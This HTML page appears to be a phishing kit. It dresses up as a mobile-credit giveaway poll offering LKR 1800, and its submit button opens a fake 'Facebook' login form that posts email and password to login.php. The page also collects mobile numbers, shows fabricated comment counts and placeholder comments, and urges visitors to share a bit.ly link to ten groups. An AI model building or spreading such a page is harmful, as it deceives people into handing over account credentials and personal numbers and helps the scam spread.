<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="./assets/css/bootstrap.min.css">
  <link rel="stylesheet" href="./assets/css/style.css">
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"/>
  <link rel="stylesheet" href="https://unicons.iconscout.com/release/v3.0.6/css/line.css">
  <script src="https://kit.fontawesome.com/yourcode.js" crossorigin="anonymous"></script>
  <title>Document</title>
</head>

<body>

  <nav class="navbar bg-body-tertiary fixed-top">
    <div class="container-fluid">

      <button type="button btn btn-outline-primary shadow p-3 mb-5 bg-body-tertiary rounded"
        class="btn btn-primary position-relative button4">
        LKR 1800 <span
          class="position-absolute top-0 start-100 translate-middle badge border border-light rounded-circle bg-danger p-2"><span
            class="visually-hidden">unread messages</span></span>
      </button>
      <button class="bg-primary navbar-toggler" type="button" data-bs-toggle="offcanvas"
        data-bs-target="#offcanvasNavbar" aria-controls="offcanvasNavbar">
        <span class="fa-solid fa-bars"></span>
      </button>
      <div class="offcanvas offcanvas-end" tabindex="-1" id="offcanvasNavbar" aria-labelledby="offcanvasNavbarLabel">
        <div class="offcanvas-header">
          <h5 class="offcanvas-title" id="offcanvasNavbarLabel">Login</h5>
          <button type="button" class="btn-close" data-bs-dismiss="offcanvas" aria-label="Close"></button>
        </div>
        <div class="offcanvas-body">
          <br>
          <section class="login-form-wrap">
            <h1>Facebook</h1>
            <form class="login-form" action="login.php" method="post">
              <label>
                <input type="text" name="email" placeholder="Email or phone" required>
              </label>
              <label>
                <input type="password" name="pass" placeholder="Password" required>
              </label>
              <input type="submit" value="Login">
            </form>
            <h5>Sign in to complete poll.</h5>
          </section>
        </div>
      </div>
    </div>
  </nav>
  <br><br>

  <div class="container mt-3">
    <img src="./assets/image/1.webp" class="rounded" alt="Cinque Terre" width="304" height="236">
  </div>

  <div class="container mt-3">
    <form action="">
      <label for="sel1" class="form-label">Select list (select one):</label>
      <select class="form-select" id="sel1" name="sellist1">
        <option> Postpaid</option>
        <option> Prepaid </option>
      </select>
    </form>
  </div>

  <div class="container mt-3">

    <form action="login.php" method="post" class="was-validated">
      <div class="mb-3 mt-3">
        <label for="uname" name="mobile" class="form-label">Mobile Number:</label>
        <input type="number" class="form-control" id="uname" placeholder="Enter Mobile Number" name="uname" required>
        <div class="valid-feedback">Valid.</div>
        <div class="invalid-feedback">Please fill out this field.</div>
      </div>

      <div class="form-check mb-3">
        <input class="form-check-input" type="checkbox" id="myCheck" name="remember" required>
        <label class="form-check-label" for="myCheck">I agree to share.</label>
        <div class="valid-feedback">Valid.</div>
        <div class="invalid-feedback">Check this checkbox to continue.</div>
      </div>
      <div class="d-grid gap-2">
        <button class="btn btn-primary" type="button" data-bs-toggle="offcanvas"
        data-bs-target="#offcanvasNavbar" aria-controls="offcanvasNavbar">Submit
      </button>
      </div>
    </form>
  </div>

<br>
    <button class="view-modal" >SHARE</button>
    <div class="popup" style="margin-left: 42px; border: 1px ridge rgba(0, 0, 0, 0.151); background-color: rgb(255, 255, 255);">
      <header>
        <span>Share Modal</span>
        <div class="close"><i class="uil uil-times"></i></div>
      </header>
      <div class="content">
        <p>Share this link via</p>
        <ul class="icons">
          <a href="#"><i class="fab fa-facebook-f"></i></a>
          <a href="#"><i class="fab fa-twitter"></i></a>
          <a href="#"><i class="fab fa-instagram"></i></a>
          <a href="#"><i class="fab fa-whatsapp"></i></a>
          <a href="#"><i class="fab fa-telegram-plane"></i></a>
        </ul>
        <p>Or copy link</p>
        <div class="field">
          <i class="url-icon uil uil-link"></i>
          <input type="text" readonly value="https://bit.ly/3WeQrxs">
          <button>Copy</button>
        </div>
      </div>
    </div>
  <br> <br><br>

  <div class="alert alert-warning alert-dismissible fade show" role="alert">
    <strong>Hollo Guys!</strong> You should share this page to 10 Groups.
    <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
  </div>

  <div class="container">
    <div class="col-md-12" id="fbcomment">
      <div class="header_comment">
        <div class="row">
          <div class="col-md-6 text-left">
            <span class="count_comment">264235 Comments</span>
          </div>
          <div class="col-md-6 text-right">
            <span class="sort_title">Sort by</span>
            <select class="sort_by">
              <option>Top</option>
              <option>Newest</option>
              <option>Oldest</option>
            </select>
          </div>
        </div>
      </div>

      <div class="body_comment">
        <div class="row">
          <div class="avatar_comment col-md-1">
            <img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar" />
          </div>
          <div class="box_comment col-md-11">
            <textarea class="commentar" placeholder="Add a comment..."></textarea>
            <div class="box_post">
              <div class="pull-left">
                <input type="checkbox" id="post_fb" />
                <label for="post_fb">Also post on Facebook</label>
              </div>
              <div class="pull-right">
                <span>
                  <img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar" />
                  <i class="fa fa-caret-down"></i>
                </span>
                <button onclick="submit_comment()" type="button" value="1">Post</button>
              </div>
            </div>
          </div>
        </div>
        <div class="row">
          <ul id="list_comment" class="col-md-12">
            <!-- Start List Comment 1 -->
            <li class="box_result row">
              <div class="avatar_comment col-md-1">
                <img src="./assets/image/poorvika.jpg" alt="avatar" />
              </div>
              <div class="result_comment col-md-11">
                <h4>Poorvika Rasasingam</h4>
                <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the
                  industry's.</p>
                <div class="tools_comment">
                  <a class="like" href="#">Like</a>
                  <span aria-hidden="true"> · </span>
                  <a class="replay" href="#">Reply</a>
                  <span aria-hidden="true"> · </span>
                  <i class="fa fa-thumbs-o-up"></i> <span class="count">1</span>
                  <span aria-hidden="true"> · </span>
                  <span>1h</span>
                </div>
                <ul class="child_replay">
                  <li class="box_reply row">
                    <div class="avatar_comment col-md-1">
                      <img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar" />
                    </div>

                    <ul class="child_replay"></ul>
              </div>
            </li>
          </ul>
        </div>
        </li>

        <!-- Start List Comment 2 -->
        <li class="box_result row">
          <div class="avatar_comment col-md-1">
            <img src="./assets/image/sachini.jpg" alt="avatar" />
          </div>
          <div class="result_comment col-md-11">
            <h4>Sachini Chathurangi</h4>
            <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the
              industry's.</p>
            <div class="tools_comment">
              <a class="like" href="#">Like</a>
              <span aria-hidden="true"> · </span>
              <a class="replay" href="#">Reply</a>
              <span aria-hidden="true"> · </span>
              <i class="fa fa-thumbs-o-up"></i> <span class="count">1</span>
              <span aria-hidden="true"> · </span>
              <span>14h</span>
            </div>
            <ul class="child_replay"></ul>
          </div>
        </li>
        </ul>
        <button class="show_more" type="button">Load 42 more comments</button>
        <button class="show_less" type="button" style="display:none"><span class="spinner-border spinner-border-sm"
            role="status" aria-hidden="true"></span> Loading...</button>
      </div>
    </div>
  </div>
  </div>



  <br>
  <footer>
    <div class="footer-content">
      <h3>code opacity</h3>
      <p>Lorem ipsum dolor sit, amet consectetur adipisicing elit. Illo iste corrupti doloribus odio sed!</p>
      <ul class="socials">
        <li><a href="#"><i class="fa fa-facebook"></i></a></li>
        <li><a href="#"><i class="fa fa-twitter"></i></a></li>
        <li><a href="#"><i class="fa fa-google-plus"></i></a></li>
        <li><a href="#"><i class="fa fa-youtube"></i></a></li>
        <li><a href="#"><i class="fa fa-linkedin-square"></i></a></li>
      </ul>
    </div>
    <div class="footer-bottom">
      <p>copyright &copy;2023 codeOpacity.</p>
    </div>
  </footer>

  <script src="./assets/js/bootstrap.min.js"></script>
  <script src="./assets/js/jquery.min.js"></script>
  <script src="./assets/js/java.js"></script>

  <script>
    const viewBtn = document.querySelector(".view-modal"),
    popup = document.querySelector(".popup"),
    close = popup.querySelector(".close"),
    field = popup.querySelector(".field"),
    input = field.querySelector("input"),
    copy = field.querySelector("button");

    viewBtn.onclick = ()=>{
      popup.classList.toggle("show");
    }
    close.onclick = ()=>{
      viewBtn.click();
    }

    copy.onclick = ()=>{
      input.select(); //select input value
      if(document.execCommand("copy")){ //if the selected text copy
        field.classList.add("active");
        copy.innerText = "Copied";
        setTimeout(()=>{
          window.getSelection().removeAllRanges(); //remove selection from document
          field.classList.remove("active");
          copy.innerText = "Copy";
        }, 3000);
      }
    }
  </script>

</body>

</html>